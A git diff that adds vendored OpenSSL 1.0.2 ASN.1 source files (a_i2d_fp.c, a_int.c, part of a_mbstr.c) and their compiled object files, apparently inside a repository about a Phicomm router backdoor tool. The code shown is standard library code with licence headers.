+        i = BIO_write(out, &(b[j]), n);
+        if (i == n)
+            break;
+        if (i <= 0) {
+            ret = 0;
+            break;
+        }
+        j += i;
+        n -= i;
+    }
+    OPENSSL_free(b);
+    return (ret);
+}
+
+#endif
+
+#ifndef OPENSSL_NO_FP_API
+int ASN1_item_i2d_fp(const ASN1_ITEM *it, FILE *out, void *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        ASN1err(ASN1_F_ASN1_ITEM_I2D_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, out, BIO_NOCLOSE);
+    ret = ASN1_item_i2d_bio(it, b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int ASN1_item_i2d_bio(const ASN1_ITEM *it, BIO *out, void *x)
+{
+    unsigned char *b = NULL;
+    int i, j = 0, n, ret = 1;
+
+    n = ASN1_item_i2d(x, &b, it);
+    if (b == NULL) {
+        ASN1err(ASN1_F_ASN1_ITEM_I2D_BIO, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+
+    for (;;) {
+        i = BIO_write(out, &(b[j]), n);
+        if (i == n)
+            break;
+        if (i <= 0) {
+            ret = 0;
+            break;
+        }
+        j += i;
+        n -= i;
+    }
+    OPENSSL_free(b);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_i2d_fp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_i2d_fp.o
new file mode 100644
index 0000000000000000000000000000000000000000..cf9f5eddeeeb374ddeba769d38c3488fb12c34ad
GIT binary patch
literal 3568
zcmbuBO>7%Q6oAJ+X#;IHru<nHMOI~yBk0PT230{3@;Y|1K~__e7^$IU>o{u?YRAT2
zD=kRv!D`h}+R_6;+_>^{>oG#D!9jrw2Yv+?euVf7qC~W%pi1Gr*_mXrwgt3Lnw^<%
z-h1=r&CKqeOs0ms9uE=XAy1Hvo}h%3?%Zg{STjZxvV;85)%~~r^a%Z2Pmj=R+I4+m
zgx)mh7wK`M_G@6;Snxj-0d<2W!kt=OU;A`%61(RfLmzaRHh#i}ajIVJPHJ`S!$lps
zmuz@k-T{xK_B~TrNgC82Ht72X{UJsF1V1n`lD$g5O3^EZ=QpO*->|oxs-Ni6Jxe`}
zm2dTTa3L!`&@|{3XPyNJW7^p31Z8(Pu(lLP&~KhOtRK=3>(4gClCI;DK4S|?KjmoB
zWvAW<cPoZlZ3<U~P*ZeO`}orHFlKPO6#X$pe=(>NE(E31CFXDv=HE0uWbp=M5kgO=
z=z9je)-s)t3}e|Jh8YN7$v~LUMl~#@vJQhRl}ux$7ZS9aC5UCu@by7fo#ga4s^7^u
zTNnsCUjHR&w~(-RMNsSedm9PMn6tgpX0D`W2^k(7d^{9MPgUpaYN%h`t48-|`>L#~
zo#>6K(Y_uBLjX+t@C-odfHJ&4O}vEEk@=vY+~ZWl^Wqrs91D1MZQt5?0nXI`@CW(W
zCs+?Df%D#^5<KS{Rzhd}!%F0Ihpt3xTM|ml`=%02C=p!=#g$-O3B;AoJ}^1N?N4sD
zPoh1jGkdS8L=uwSqoDf=x4X#g&U&9zf~Rrb8rVg>FDs#h64ck{S>pQtXC7|SRN<BK
zlhw7R0RX<1Zw}-lo13kC;Hj1P*lskB_z2#%X7Q2EW(dSb?r7rM8NuCd79ZKt1n&Z}
zQ(70>Yhc|_@Z7is_q7#|x8VocaC}R)@{?=B=YeCKB0jd)z-n#u&$r>Pw&Ab0;co!P
zdB^ZzfUq+O^&*s3@qYju_5E<sP(++Wy2Wa0FiQ0C{TjR2Q?o^44yQ)rddeIf8X8Yd
zm=k(Dl{CrV*ueu6qh=wK&lj^KIW}gNs<vsB%f&K@kBpl0<yqSjTDh`i5!0;Lne0(B
zJ9E^`WoGjmv*b$5q+;e~^A>B)S@W#U+T}cJFb_^xwpCb<Z4==R#W;B7($8yLHlE6x
zYmVT#K*5`UA3VX~UB(2t0!8pM4rcmY5`RnLn0KLnS>kw>1^-#%cT0R#;`r_p`aAjl
zy5s4Q_`Q<;K8bIWcwFN5Nt{YNDDk%?F6Uuc;&L9ombjdUs}h&<@BlxDxGp&lyCp8?
zVNl|7Jd+Za^Drav`=xbNBrfM61Ue`<%vD(b2zzdDanE0Kad8jvo}mao;=U2Ja=c(?
zrl7XVPCX-9Wh<XiZR?m#)ai_!A?j46Lez2*JE*Ry8d0;wLcy8?mARsAsqo3%!>$zX
zKQ~uZOXXt8D%;1w6dhVKX0DtmSWY~*`wW2t+)DSGItC1-CMOO0eB0R=K6XLDy^cYV
zWrlxRBHSL&EZTN*B|MWT4?{uj{-QNp^P(<_dw%?Wqt9El*SODKsAUoJW8AWc`9&Rr
zL2O55C1`)d<A21(g`KEJU|h6i)xZAZ`VWE;rn*U;CnO|0g|^7Qz%M`p=XcwOxcv>G
z$ZNNK9(b$$zrcSLj&M87BO+lh_P^EKXc9!HASE6c{%4>Mw>|oF?>!)Lh9BrJu_K8)
U*ZA&gW&b;m|0T&5n{NAm0Ad_&f&c&j

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_int.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_int.c
new file mode 100644
index 0000000..70c2b8e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_int.c
@@ -0,0 +1,462 @@
+/* crypto/asn1/a_int.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/bn.h>
+
+ASN1_INTEGER *ASN1_INTEGER_dup(const ASN1_INTEGER *x)
+{
+    return M_ASN1_INTEGER_dup(x);
+}
+
+int ASN1_INTEGER_cmp(const ASN1_INTEGER *x, const ASN1_INTEGER *y)
+{
+    int neg, ret;
+    /* Compare signs */
+    neg = x->type & V_ASN1_NEG;
+    if (neg != (y->type & V_ASN1_NEG)) {
+        if (neg)
+            return -1;
+        else
+            return 1;
+    }
+
+    ret = ASN1_STRING_cmp(x, y);
+
+    if (neg)
+        return -ret;
+    else
+        return ret;
+}
+
+/*-
+ * This converts an ASN1 INTEGER into its content encoding.
+ * The internal representation is an ASN1_STRING whose data is a big endian
+ * representation of the value, ignoring the sign. The sign is determined by
+ * the type: V_ASN1_INTEGER for positive and V_ASN1_NEG_INTEGER for negative.
+ *
+ * Positive integers are no problem: they are almost the same as the DER
+ * encoding, except if the first byte is >= 0x80 we need to add a zero pad.
+ *
+ * Negative integers are a bit trickier...
+ * The DER representation of negative integers is in 2s complement form.
+ * The internal form is converted by complementing each octet and finally
+ * adding one to the result. This can be done less messily with a little trick.
+ * If the internal form has trailing zeroes then they will become FF by the
+ * complement and 0 by the add one (due to carry) so just copy as many trailing
+ * zeros to the destination as there are in the source. The carry will add one
+ * to the last none zero octet: so complement this octet and add one and finally
+ * complement any left over until you get to the start of the string.
+ *
+ * Padding is a little trickier too. If the first bytes is > 0x80 then we pad
+ * with 0xff. However if the first byte is 0x80 and one of the following bytes
+ * is non-zero we pad with 0xff. The reason for this distinction is that 0x80
+ * followed by optional zeros isn't padded.
+ */
+
+int i2c_ASN1_INTEGER(ASN1_INTEGER *a, unsigned char **pp)
+{
+    int pad = 0, ret, i, neg;
+    unsigned char *p, *n, pb = 0;
+
+    if (a == NULL)
+        return (0);
+    neg = a->type & V_ASN1_NEG;
+    if (a->length == 0)
+        ret = 1;
+    else {
+        ret = a->length;
+        i = a->data[0];
+        if (!neg && (i > 127)) {
+            pad = 1;
+            pb = 0;
+        } else if (neg) {
+            if (i > 128) {
+                pad = 1;
+                pb = 0xFF;
+            } else if (i == 128) {
+                /*
+                 * Special case: if any other bytes non zero we pad:
+                 * otherwise we don't.
+                 */
+                for (i = 1; i < a->length; i++)
+                    if (a->data[i]) {
+                        pad = 1;
+                        pb = 0xFF;
+                        break;
+                    }
+            }
+        }
+        ret += pad;
+    }
+    if (pp == NULL)
+        return (ret);
+    p = *pp;
+
+    if (pad)
+        *(p++) = pb;
+    if (a->length == 0)
+        *(p++) = 0;
+    else if (!neg)
+        memcpy(p, a->data, (unsigned int)a->length);
+    else {
+        /* Begin at the end of the encoding */
+        n = a->data + a->length - 1;
+        p += a->length - 1;
+        i = a->length;
+        /* Copy zeros to destination as long as source is zero */
+        while (!*n) {
+            *(p--) = 0;
+            n--;
+            i--;
+        }
+        /* Complement and increment next octet */
+        *(p--) = ((*(n--)) ^ 0xff) + 1;
+        i--;
+        /* Complement any octets left */
+        for (; i > 0; i--)
+            *(p--) = *(n--) ^ 0xff;
+    }
+
+    *pp += ret;
+    return (ret);
+}
+
+/* Convert just ASN1 INTEGER content octets to ASN1_INTEGER structure */
+
+ASN1_INTEGER *c2i_ASN1_INTEGER(ASN1_INTEGER **a, const unsigned char **pp,
+                               long len)
+{
+    ASN1_INTEGER *ret = NULL;
+    const unsigned char *p, *pend;
+    unsigned char *to, *s;
+    int i;
+
+    if ((a == NULL) || ((*a) == NULL)) {
+        if ((ret = M_ASN1_INTEGER_new()) == NULL)
+            return (NULL);
+        ret->type = V_ASN1_INTEGER;
+    } else
+        ret = (*a);
+
+    p = *pp;
+    pend = p + len;
+
+    /*
+     * We must OPENSSL_malloc stuff, even for 0 bytes otherwise it signifies
+     * a missing NULL parameter.
+     */
+    s = (unsigned char *)OPENSSL_malloc((int)len + 1);
+    if (s == NULL) {
+        i = ERR_R_MALLOC_FAILURE;
+        goto err;
+    }
+    to = s;
+    if (!len) {
+        /*
+         * Strictly speaking this is an illegal INTEGER but we tolerate it.
+         */
+        ret->type = V_ASN1_INTEGER;
+    } else if (*p & 0x80) {     /* a negative number */
+        ret->type = V_ASN1_NEG_INTEGER;
+        if ((*p == 0xff) && (len != 1)) {
+            p++;
+            len--;
+        }
+        i = len;
+        p += i - 1;
+        to += i - 1;
+        while ((!*p) && i) {
+            *(to--) = 0;
+            i--;
+            p--;
+        }
+        /*
+         * Special case: if all zeros then the number will be of the form FF
+         * followed by n zero bytes: this corresponds to 1 followed by n zero
+         * bytes. We've already written n zeros so we just append an extra
+         * one and set the first byte to a 1. This is treated separately
+         * because it is the only case where the number of bytes is larger
+         * than len.
+         */
+        if (!i) {
+            *s = 1;
+            s[len] = 0;
+            len++;
+        } else {
+            *(to--) = (*(p--) ^ 0xff) + 1;
+            i--;
+            for (; i > 0; i--)
+                *(to--) = *(p--) ^ 0xff;
+        }
+    } else {
+        ret->type = V_ASN1_INTEGER;
+        if ((*p == 0) && (len != 1)) {
+            p++;
+            len--;
+        }
+        memcpy(s, p, (int)len);
+    }
+
+    if (ret->data != NULL)
+        OPENSSL_free(ret->data);
+    ret->data = s;
+    ret->length = (int)len;
+    if (a != NULL)
+        (*a) = ret;
+    *pp = pend;
+    return (ret);
+ err:
+    ASN1err(ASN1_F_C2I_ASN1_INTEGER, i);
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        M_ASN1_INTEGER_free(ret);
+    return (NULL);
+}
+
+/*
+ * This is a version of d2i_ASN1_INTEGER that ignores the sign bit of ASN1
+ * integers: some broken software can encode a positive INTEGER with its MSB
+ * set as negative (it doesn't add a padding zero).
+ */
+
+ASN1_INTEGER *d2i_ASN1_UINTEGER(ASN1_INTEGER **a, const unsigned char **pp,
+                                long length)
+{
+    ASN1_INTEGER *ret = NULL;
+    const unsigned char *p;
+    unsigned char *s;
+    long len;
+    int inf, tag, xclass;
+    int i;
+
+    if ((a == NULL) || ((*a) == NULL)) {
+        if ((ret = M_ASN1_INTEGER_new()) == NULL)
+            return (NULL);
+        ret->type = V_ASN1_INTEGER;
+    } else
+        ret = (*a);
+
+    p = *pp;
+    inf = ASN1_get_object(&p, &len, &tag, &xclass, length);
+    if (inf & 0x80) {
+        i = ASN1_R_BAD_OBJECT_HEADER;
+        goto err;
+    }
+
+    if (tag != V_ASN1_INTEGER) {
+        i = ASN1_R_EXPECTING_AN_INTEGER;
+        goto err;
+    }
+
+    /*
+     * We must OPENSSL_malloc stuff, even for 0 bytes otherwise it signifies
+     * a missing NULL parameter.
+     */
+    s = (unsigned char *)OPENSSL_malloc((int)len + 1);
+    if (s == NULL) {
+        i = ERR_R_MALLOC_FAILURE;
+        goto err;
+    }
+    ret->type = V_ASN1_INTEGER;
+    if (len) {
+        if ((*p == 0) && (len != 1)) {
+            p++;
+            len--;
+        }
+        memcpy(s, p, (int)len);
+        p += len;
+    }
+
+    if (ret->data != NULL)
+        OPENSSL_free(ret->data);
+    ret->data = s;
+    ret->length = (int)len;
+    if (a != NULL)
+        (*a) = ret;
+    *pp = p;
+    return (ret);
+ err:
+    ASN1err(ASN1_F_D2I_ASN1_UINTEGER, i);
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        M_ASN1_INTEGER_free(ret);
+    return (NULL);
+}
+
+int ASN1_INTEGER_set(ASN1_INTEGER *a, long v)
+{
+    int j, k;
+    unsigned int i;
+    unsigned char buf[sizeof(long) + 1];
+    long d;
+
+    a->type = V_ASN1_INTEGER;
+    if (a->length < (int)(sizeof(long) + 1)) {
+        if (a->data != NULL)
+            OPENSSL_free(a->data);
+        if ((a->data =
+             (unsigned char *)OPENSSL_malloc(sizeof(long) + 1)) != NULL)
+            memset((char *)a->data, 0, sizeof(long) + 1);
+    }
+    if (a->data == NULL) {
+        ASN1err(ASN1_F_ASN1_INTEGER_SET, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    d = v;
+    if (d < 0) {
+        d = -d;
+        a->type = V_ASN1_NEG_INTEGER;
+    }
+
+    for (i = 0; i < sizeof(long); i++) {
+        if (d == 0)
+            break;
+        buf[i] = (int)d & 0xff;
+        d >>= 8;
+    }
+    j = 0;
+    for (k = i - 1; k >= 0; k--)
+        a->data[j++] = buf[k];
+    a->length = j;
+    return (1);
+}
+
+long ASN1_INTEGER_get(const ASN1_INTEGER *a)
+{
+    int neg = 0, i;
+    long r = 0;
+
+    if (a == NULL)
+        return (0L);
+    i = a->type;
+    if (i == V_ASN1_NEG_INTEGER)
+        neg = 1;
+    else if (i != V_ASN1_INTEGER)
+        return -1;
+
+    if (a->length > (int)sizeof(long)) {
+        /* hmm... a bit ugly, return all ones */
+        return -1;
+    }
+    if (a->data == NULL)
+        return 0;
+
+    for (i = 0; i < a->length; i++) {
+        r <<= 8;
+        r |= (unsigned char)a->data[i];
+    }
+    if (neg)
+        r = -r;
+    return (r);
+}
+
+ASN1_INTEGER *BN_to_ASN1_INTEGER(const BIGNUM *bn, ASN1_INTEGER *ai)
+{
+    ASN1_INTEGER *ret;
+    int len, j;
+
+    if (ai == NULL)
+        ret = M_ASN1_INTEGER_new();
+    else
+        ret = ai;
+    if (ret == NULL) {
+        ASN1err(ASN1_F_BN_TO_ASN1_INTEGER, ERR_R_NESTED_ASN1_ERROR);
+        goto err;
+    }
+    if (BN_is_negative(bn))
+        ret->type = V_ASN1_NEG_INTEGER;
+    else
+        ret->type = V_ASN1_INTEGER;
+    j = BN_num_bits(bn);
+    len = ((j == 0) ? 0 : ((j / 8) + 1));
+    if (ret->length < len + 4) {
+        unsigned char *new_data = OPENSSL_realloc(ret->data, len + 4);
+        if (!new_data) {
+            ASN1err(ASN1_F_BN_TO_ASN1_INTEGER, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        ret->data = new_data;
+    }
+    ret->length = BN_bn2bin(bn, ret->data);
+    /* Correct zero case */
+    if (!ret->length) {
+        ret->data[0] = 0;
+        ret->length = 1;
+    }
+    return (ret);
+ err:
+    if (ret != ai)
+        M_ASN1_INTEGER_free(ret);
+    return (NULL);
+}
+
+BIGNUM *ASN1_INTEGER_to_BN(const ASN1_INTEGER *ai, BIGNUM *bn)
+{
+    BIGNUM *ret;
+
+    if ((ret = BN_bin2bn(ai->data, ai->length, bn)) == NULL)
+        ASN1err(ASN1_F_ASN1_INTEGER_TO_BN, ASN1_R_BN_LIB);
+    else if (ai->type == V_ASN1_NEG_INTEGER)
+        BN_set_negative(ret, 1);
+    return (ret);
+}
+
+IMPLEMENT_STACK_OF(ASN1_INTEGER)
+
+IMPLEMENT_ASN1_SET_OF(ASN1_INTEGER)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_int.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_int.o
new file mode 100644
index 0000000000000000000000000000000000000000..758cd03f3624e07a1df7904b3bcd9db5c8109b50
GIT binary patch
literal 5576
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_mbstr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_mbstr.c
new file mode 100644
index 0000000..6935efe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_mbstr.c
@@ -0,0 +1,423 @@
+/* a_mbstr.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+static int traverse_string(const unsigned char *p, int len, int inform,
+                           int (*rfunc) (unsigned long value, void *in),
+                           void *arg);
+static int in_utf8(unsigned long value, void *arg);
+static int out_utf8(unsigned long value, void *arg);
+static int type_str(unsigned long value, void *arg);
+static int cpy_asc(unsigned long value, void *arg);
+static int cpy_bmp(unsigned long value, void *arg);
+static int cpy_univ(unsigned long value, void *arg);
+static int cpy_utf8(unsigned long value, void *arg);
+static int is_printable(unsigned long value);
+
+/*
+ * These functions take a string in UTF8, ASCII or multibyte form and a mask
+ * of permissible ASN1 string types. It then works out the minimal type
